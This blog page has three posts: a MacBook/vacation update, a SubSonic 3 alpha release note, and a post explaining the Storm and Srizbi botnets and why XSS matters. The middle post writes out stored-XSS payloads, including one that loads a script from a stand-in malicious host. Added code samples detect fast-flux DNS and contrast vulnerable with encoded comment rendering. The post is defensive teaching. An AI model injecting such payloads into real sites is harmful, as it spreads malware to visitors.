Where’s MVC Storefront?

A lot of people have been asking about the Storefront and whether I’ve abandoned it with all that’s gone on with Oxite, etc. The short answer is no – I haven’t. And believe it or not, Oxite didn’t impact anything with respect to the storefront at all. I promise!

The deal is that I’m on vacation right now for 2.5 weeks or so in Portland (LOVE IT here). While on vacation I’m stealing time to work on stuff – mainly our forthcoming book. The rest of the time I’m hanging with my family and trying not to freeze to death. People tell me we’re below the Arctic Circle, but I think Portland may actually be somewhere north of Juneau, and they move it around just like in Lost.

The good news is that I have a new one of these things:

I really can’t say enough about it. This may sound completely silly, but the thing that sold me was the construction of the case – it’s milled from a solid piece of metal. If you notice in the picture – there are no seams. The display is covered completely with a protective glass – this is huge if you have kids that like to poke at Diego and Dora on the screen. It also makes it very easy to clean.

It’s literally about twice as fast as my 2 yr. old MacBook – the main reason being the Core 2 Duo processors and DDR3 RAM (which is a big step up from 2 years ago). The price tag is still pretty spendy – the base MacBook Pro comes in at $1990, the upgraded version is $2499. The good news, however, is that the upgraded version has a bigger hard drive and fills all the RAM slots so you don’t need to buy more RAM – it’s already maxed at 4G.

To be honest I feel completely lame for buying this thing with the economy the way it is. The truth of it, however, is that I will be travelling a lot in the coming year and my wife has sort of taken over my old MBP. We could share – sure – and we probably should have. I feel a bit like I’m fiddling while Rome’s aflame. It’s my job, however, and there are things that you can categorize as luxury, as equipment, and as both. I happen to be very high maintenance when it comes to equipment :) and buying a computer every 2 years really is not that crazy.

A Word About Rails
Macs come with Rails installed (1.2.6 I believe) as well as Ruby (1.8.6). I usually wipe it completely out and start from scratch (I leave Ruby though) as I never trust factory installs with anything.

It took me about 15 minutes to download and install the latest Rails version (2.2.3) as well as update Gems and install TextMate. I hadn’t played with Rails in a while and it was a lot of fun to see what’s come of the framework in the last year and a half. The use of SQLite is an interesting one – not too sure what I think of it, but it made the experience a lot simpler, I must say.

The reason I bring this up is simply to say that I’m not losing sight of the type of simplicity I love. I’ve ventured deep into DDD land of late (as well as some other areas) and messed around with the more “ornate” and “baroque” sides of development. Hopefully you won’t read an opinion in there – I’ve learned a WHOLE LOT and I have to say that I’m 100 times the geek I was before I started.

The thing I’m getting at here is that I love simple things. Truly. It’s one of the reasons I really dig the MacBook: the design is soooo clean and simple, the buttons are just the right size, and there isn’t a lot of “engineering filigree” all over the thing. It’s quite Zen.

To bring us back to where I started (with the Storefront) – it’s always been my focus to keep it simple yet powerful. There is some work left to do with my refactoring, but I’m taking some time away right now to regenerate mind, body, and spirit and hopefully my journey will benefit you in the end.

Posted in Blather | 8 Comments

The Perfect Storm Botnet

I’m sure you’ve been told, numerous times no doubt, about Cross-site scripting and that it’s bad. I think, for most developers, the only fear they have of XSS is looking foolish when someone hacks their site, shredding the layout of their pages and sending popups all over the screen. At least that’s what I thought a while back. And it’s all because I didn’t quite get the depth of the soul-corroding evil that uses XSS as a primary attack point. Nor how pervasive it is.

Come with me, friends, on a Dante’s journey into the black, horrible, dirty depths of the Botnet: the hordes of zombie drone computers on the internet that work to Enlarge your Penis, sell you Cialis, and melt your face.

An Inconvenient Zombie Death Army
I was studying up today for a book I’m writing (the security chapter) and I decided to devote the afternoon to getting to know more about spam, spammers, and the viruses they write. I know that most machines, when they get infected with a trojan or worm, become part of a larger network which coordinates distributed sending of nasty email. What I didn’t know was just how evil these things really are (from Wikipedia):

The [Storm] botnet reportedly is powerful enough as of September 2007 to force entire countries off the Internet, and is estimated to be capable of executing more instructions per second than some of the world’s top supercomputers. However, it is not a completely accurate comparison, according to security analyst James Turner, who said that comparing a botnet to a supercomputer is like comparing an army of snipers to a nuclear weapon

If that made you catch your breath a bit, read on…

At certain points in time, the Storm worm used to spread the botnet has attempted to release hundreds or thousands of versions of itself onto the Internet, in a concentrated attempt to overwhelm the defenses of anti-virus and malware security firms. According to Joshua Corman, an IBM security researcher, "This is the first time that I can remember ever seeing researchers who were actually afraid of investigating an exploit."

It’s one of those things that you really don’t want to know about; but it’s really hard to pull yourself out once you’re in. This rat-hole goes very, very deep. But is it all real? Or is it just some hyped up marketing prattle to get you to buy an Antivirus? You decide for yourself.


The Picture of Evil: The Srizbi Trojan
Srizbi is only a few years old and most likely evolved from an earlier trojan. It’s a very small trojan, but it packs one hell of a punch (emphasis mine):

Apart from having an efficient spam engine, the trojan is also very capable in hiding itself from both the user and the system itself, including any products designed to remove the trojan from the system. The trojan itself is fully executed in kernel mode and has been noted to employ rootkit-like technologies to prevent any form of detection. By patching the NTFS file system drivers, the trojan will make its files invisible for both the operating system and any human user utilizing the system. The trojan is also capable of hiding network traffic it generates by directly attaching NDIS and TCP/IP drivers to its own process, a feature currently unique for this trojan. This procedure has been proved to allow the trojan to bypass both firewall and sniffer protection on the system.

Once the bot is in place and operational, it will contact one of the hardcoded servers from a list it carries with it. This server will then supply the bot with a zip file containing a number of files required by the bot to start its spamming business. The following files have been identified to be downloaded:

  1. 000_data2 – mail server domains
  2. 001_ncommall – list of names
  3. 002_senderna – list of possible sender names
  4. 003_sendersu – list of possible sender surnames
  5. config – Main spam configuration file
  6. message – HTML message to spam
  7. mlist – Recipients mail addresses
  8. mxdata – MX record data

When these files have been received, the bot will first initialize a software routine which allows it to remove files critical for revealing spam and rootkit applications. After this procedure is done, the trojan will then start sending out the spam message it has received from the control server.

This trojan actually patches the NTFS file system driver in a sort of "Jedi mind trick" that tells it "these are not the files you’re looking for". Not only that, it hooks itself DIRECTLY into the NDIS and TCP/IP drivers, so its traffic rides out of the machine below the host firewall and below any sniffer running on the box. That, friends, is nutso.

The most insidious part of all of this is that Srizbi is spread using a toolset called MPack, a PHP-based, commercially available exploit kit. Yes, that’s correct – it’s malware sold and supported like a commercial SDK:

Unusual for such kits, MPack is sold as commercial software (costing $500 to $1,000 US), and is provided by its developers with technical support and regular updates of the software vulnerabilities it exploits. Modules are sold by the developers containing new exploits. These cost between $50 and $150 US depending on how severe the exploit is. The developers also charge to make the scripts and executables undetectable by antivirus software.

The kit doesn’t exploit XSS holes itself; it exploits bugs in the visitor’s browser and operating system. What an XSS hole (or any other HTML injection hole) in a website gives the attacker is a way to plant the kit’s loader on a site that its visitors already trust:

The server-side software in the kit is able to customize attacks to a variety of web browsers including Microsoft Internet Explorer, Mozilla Firefox and Opera. MPack generally works by being loaded in an IFrame attached to the bottom of a defaced website. When a user visits the page, MPack sends a script that loads in the IFrame and determines if any vulnerabilities in the browser or operating system can be exploited. If it finds any, it will exploit them and store various statistics for future reference.

Included with the server is a management console, which allows the attacker deploying the software to view statistics about the computers that have been infected, including what web browsers they were using and what countries their connections originated from.

In fact, take away injected scripts and IFrames on legitimate sites and a primary propagation path for spam trojans like Srizbi goes with it. The other path is plain social engineering: the network propagates itself using the "Stupid Theme", wherein people are sent emails that say "we have video of you naked, click here". The subject matter changes (from naked celebrities to instant fortunes) but occasionally people end up clicking on them, get sent to a compromised site, and BAM, another drone is born.

Evil’s Super Evil Twin: The Storm Worm
The Storm worm is like Srizbi, but just a tad scarier. It’s spread from a system of servers that hide behind a DNS trick called "fast flux". Fast flux puts one or more zombie hosts in front of the real servers as proxies (a single layer, or a second layer of fluxing name servers in front of that), and rotates the address records and aliases behind a name up to twice a minute. That constant rotation makes the servers behind the name very hard to pin down, and it’s a big part of what makes the Storm botnet so hard to take down.
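Here is an added example of the kind of heuristic a responder uses to spot a fast-flux name from repeated lookups. It is my own code, not from the post and not from any Storm analysis; the domain names, IPs, TTLs and thresholds are all made up, and real tooling would feed it successive dig answers or passive-DNS records instead of the hard-coded snapshots below.

```javascript
// Added example: fast-flux heuristic over repeated DNS lookups.
// Everything below is constructed for illustration; the names use
// .invalid and the IPs come from documentation ranges.

// One snapshot = one lookup of a name's A records: time in seconds,
// the TTL the resolver returned, and the IPs in the answer.
const snapshots = {
  // rotates to three fresh IPs in three unrelated networks every 30 s
  'flux.example.invalid': [
    { t: 0,  ttl: 30, ips: ['203.0.113.7',    '198.51.100.40', '192.0.2.99'] },
    { t: 30, ttl: 30, ips: ['198.51.100.203', '203.0.113.88',  '192.0.2.12'] },
    { t: 60, ttl: 30, ips: ['192.0.2.130',    '203.0.113.201', '198.51.100.9'] },
  ],
  // short TTL too, but the IPs stay inside one provider's network
  'cdn.example.invalid': [
    { t: 0,   ttl: 300, ips: ['198.51.100.10', '198.51.100.11'] },
    { t: 300, ttl: 300, ips: ['198.51.100.11', '198.51.100.10'] },
    { t: 600, ttl: 300, ips: ['198.51.100.12', '198.51.100.10'] },
  ],
  // boring, stable host
  'static.example.invalid': [
    { t: 0,    ttl: 3600, ips: ['192.0.2.1'] },
    { t: 3600, ttl: 3600, ips: ['192.0.2.1'] },
  ],
};

// Crude "network" key: the first two octets. Good enough to tell
// "many IPs in one hosting range" from "many IPs in many home ISPs".
function prefix16(ip) {
  return ip.split('.').slice(0, 2).join('.');
}

// Summarise a series of lookups for one name.
function fluxFeatures(lookups) {
  const ips = new Set();
  const nets = new Set();
  let minTtl = Infinity;
  let churn = 0; // IPs that were not in the previous answer
  lookups.forEach((l, i) => {
    l.ips.forEach((ip) => { ips.add(ip); nets.add(prefix16(ip)); });
    minTtl = Math.min(minTtl, l.ttl);
    if (i > 0) {
      const prev = new Set(lookups[i - 1].ips);
      churn += l.ips.filter((ip) => !prev.has(ip)).length;
    }
  });
  return { lookups: lookups.length, distinctIps: ips.size, distinctNets: nets.size, minTtl, churn };
}

// Thresholds are assumptions for this example, chosen so that a CDN
// (short TTL, few networks) does not trip them but a flux network
// (short TTL, many networks, answers that change almost every time) does.
function looksFastFlux(f) {
  const churnPerLookup = f.lookups > 1 ? f.churn / (f.lookups - 1) : 0;
  return f.minTtl <= 300 && f.distinctNets >= 3 && churnPerLookup >= 2;
}

// Classify every name in the snapshot table.
function classify(table) {
  const out = {};
  for (const name of Object.keys(table)) {
    const f = fluxFeatures(table[name]);
    out[name] = { ...f, fastFlux: looksFastFlux(f) };
  }
  return out;
}

for (const [name, r] of Object.entries(classify(snapshots))) {
  console.log(name, r.fastFlux ? 'FAST FLUX' : 'ok', JSON.stringify(r));
}
```

The network-diversity check is the important one: CDNs and round-robin load balancers also hand out short TTLs and changing answers, but their addresses sit in a handful of provider ranges, while a flux network's proxies are infected home machines scattered across many ISPs. A real responder would also watch the NS records for the same churn (the double-flux case) and look at how recently the domain was registered.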

The thing that sets the Storm botnet (the fleet of zombie computers infected with the worm) apart is that it’s actually capable of defending itself – on its own:

The Storm botnet was observed to be defending itself, and attacking computer systems that scanned for Storm virus-infected computer systems online. The botnet will defend itself with DDoS counter-attacks, to maintain its own internal integrity. At certain points in time, the Storm worm used to spread the botnet has attempted to release hundreds or thousands of versions of itself onto the Internet, in a concentrated attempt to overwhelm the defenses of anti-virus and malware security firms.

Mess with the worm, get the DDoS horns. More from Joshua Corman:

"If you try to attach a debugger, or query sites it’s reporting into, it knows and punishes you instantaneously. [Over at] SecureWorks, a chunk of it DDoS-ed a researcher off the network. Every time I hear of an investigator trying to investigate, they’re automatically punished. It knows it’s being investigated, and it punishes them. It fights back," Corman said.

The crazy part about all of this is that no one’s really sure just how big this zombie death army is; after all, it doesn’t want to be seen, and doesn’t want you to know it’s there. These guys make money on a very weird scale: reportedly only about 1 in 10 million spam emails sent results in a payment, so to make more money you need to send more email. If you’re busy fighting back, you’re not sending mail, and moreover you’re exposing yourself and your operation. It’s best to remain silent and hidden, growing your Death Army one machine at a time:

According to Matt Sergeant, chief anti-spam technologist at MessageLabs, "In terms of power, [the botnet] utterly blows the supercomputers away. If you add up all 500 of the top supercomputers, it blows them all away with just 2 million of its machines. It’s very frightening that criminals have access to that much computing power, but there’s not much we can do about it." It is estimated that only 10%-20% of the total capacity and power of the Storm botnet is currently being used.

Spam is organized, sophisticated, and thoroughly nasty. It goes beyond annoying when you consider the power these guys have at their fingertips, and that we just can’t catch them. But there is something you can do, and it’s so small and so very, very simple. In fact it’s only 10 little letters:


Why, you may ask? Because a primary vector of release for these things is script injection, where the bad guys use your site to link off to a zombie host that serves the nasty script that wants to eat your computer’s face. You can do something about this – and you should!

You Are Not Prepared
Over the last year, people have been very quick to point out that many of the samples I’ve created have been vulnerable to XSS. Sheepishly I’ve made the fix each time, kicking myself for being lame. We didn’t need to worry about this so much with Web Forms, but with MVC and hand-rolled HTML, the issue has become greater, and more awareness is needed.

Yesterday, as I was reading over Oxite’s source code with Damien Guard (this is not to pick on them, just an illustration of how easy it is to let stuff slip), I entered this into the URL field of the comments:

"><script>alert("ha ha ha I suck");</script><a href="

Update: This has been fixed at MIX Online – please don’t bother trying.

And wouldn’t ya know it – it worked perfectly, popping up a really annoying message every time I opened the page up. It happened every time because the database saved the comment and the page re-rendered my script on every load; this is what’s called stored (or persistent) script injection, as opposed to the reflected kind that only fires when someone follows a crafted link.

Now if I were evil, I could have done something like this (of course this URL is fake):

"></a><script src=http://srizbitrojan.mynastyninjasite.com/spreadbadness.js></script> <a href="

This is the comment author’s URL, and his name will still be linkable even with this script line in there. If I’d had my hands on MPack, who knows what kind of stuff I could have done!

To get around this, all the developer needed to do was

  1. Be aware of the evil that lies behind XSS, and why it wants to melt your face and eat your children, and
  2. Use Html.Encode() on ANYTHING that is output on a page, whether it lands in element text or inside an attribute value like the href above. One caveat: encoding keeps a value inside the attribute, but it can’t stop a value like javascript:alert(1) from being a perfectly valid, perfectly harmful href, so a URL field also needs a check that it really is an http or https URL before it gets turned into a link.

Please, for the children, encode your output.
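As an added example (my own code, not Oxite’s and not from the post), here is the comment rendering written both ways in Node.js: once the way the vulnerable page did it, building the anchor by string concatenation, and once with every field HTML-encoded and the URL checked for an http or https scheme. The htmlEncode helper stands in for Html.Encode(); the sample comments are constructed, and the first two URLs are the two payloads above.

```javascript
// Added example: stored-XSS-prone comment rendering vs. the encoded version.
// Plain Node.js, no dependencies. All sample comments are constructed.

// Stand-in for Html.Encode(): the five characters that can break out of
// element text or a double-quoted attribute value.
function htmlEncode(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Encoding keeps a value inside the attribute, but it does not make the value
// a safe link target: javascript: and data: are valid attribute text.
// Only absolute http(s) URLs are allowed through.
function safeUrl(raw) {
  let url;
  try {
    url = new URL(String(raw));
  } catch (e) {
    return null; // not a URL at all, e.g. the "><script> payloads
  }
  return url.protocol === 'http:' || url.protocol === 'https:' ? url.href : null;
}

// VULNERABLE: the hand-rolled view drops stored fields straight into markup.
function renderCommentUnsafe(c) {
  return '<a href="' + c.url + '">' + c.name + '</a>: ' + c.body;
}

// HARDENED: every field encoded on output; the link is dropped if the URL
// does not pass validation, and the name is shown as plain text instead.
function renderCommentSafe(c) {
  const url = safeUrl(c.url);
  const name = htmlEncode(c.name);
  const link = url
    ? '<a href="' + htmlEncode(url) + '" rel="nofollow">' + name + '</a>'
    : name;
  return link + ': ' + htmlEncode(c.body);
}

// Check helper: list any tag in the output other than the one <a> the template
// itself emits. Anything else came from user data.
function injectedTags(html) {
  const tags = html.match(/<\/?[a-z][^>]*>/gi) || [];
  return tags.filter((t) => !/^<\/?a[\s>]/i.test(t));
}

// Constructed comments. The first two URLs are the payloads from the post;
// the third shows why the scheme check matters even with encoding.
const comments = [
  { name: 'rob', url: '"><script>alert("ha ha ha I suck");</script><a href="', body: 'nice site' },
  { name: 'rob', url: '"></a><script src=http://srizbitrojan.mynastyninjasite.com/spreadbadness.js></script> <a href="', body: 'nice site' },
  { name: 'x', url: 'javascript:alert(document.cookie)', body: '<img src=x onerror=alert(1)>' },
  { name: 'Alice <3', url: 'https://example.com/?a=1&b=2', body: 'Hello & welcome' },
];

for (const c of comments) {
  const unsafe = renderCommentUnsafe(c);
  console.log('UNSAFE:', unsafe, '| injected tags:', injectedTags(unsafe).length);
  console.log('SAFE:  ', renderCommentSafe(c));
}
```

Run it and the unsafe renderer emits a live script element for both payloads, while the hardened one prints "rob: nice site" with no link at all, because neither payload parses as a URL. The third comment is the case Html.Encode() alone does not cover: the encoded href would still read javascript:alert(document.cookie) and still run on click, which is why the scheme check sits beside the encoding rather than replacing it.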

Further Reading

I had a really good time investigating the chapter I’m writing, and if you’re interested in any of the above, here are some links to get you started. It’s good stuff to know, but you’ll get dirty along the way:

Posted in XSS | 17 Comments

SubSonic 3 Alpha Updated

Many thanks to the folks who downloaded and ran the alpha. As I figured, I missed a few things. The good news is that I’ve fixed them, and 99% of them were with the templates – which is good news because it means that you could have fixed them if you had to :).

But first – I’d like to say a big HELLO! to all the folks at CodeBetter, because as of today, I will be cross-posting my blog there. Indeed it’s quite an honor and many thanks to Jeremy Miller for inviting me!

Here’s the updated list of bits:

  1. Fixed an SP bug that would result in the command type not getting set properly
  2. Restructured and re-organized the namespacing
  3. Renamed the DLL to SubSonic.Core, rather than SubSonic (forgot to do that earlier)
  4. Fixed up the _Settings.tt template to more accurately convey just WTF it is you’re setting
  5. Fixed a foreign-key naming bug which allowed spaces through
  6. Fixed a bug with self-referencing tables, wherein a child property could wiggle through and end up having the same name as the parent
  7. Fixed a commenting issue in the Repositories, which VS didn’t like

You can download the source, if you like, or grab the download here (DLL plus templates). If you have a question – you can leave a note here or (preferably) ask it here, on our mailing list.

Setup Walkthrough
I was asked on the comments of my last post for a walkthrough – so here it is. Setting up SubSonic 3:

1) Download the bits.

2) Open Zip file, and put on your hard drive somewhere

3) Create a project and add an app/web.config file

4) Add a VALID connection string to your favorite DB

5) Edit the _Settings.tt file, letting it know the name of your connection string and whatever Namespace you want for your generated objects:


6) Drag the _Generated file into your project – put it where you like


7) You’re done. Go grab a soda, then start coding.

If you want more information about how to use what’s generated for you, read more here and also read up here.

Many thanks to the folks testing!

Posted in SubSonic | 6 Comments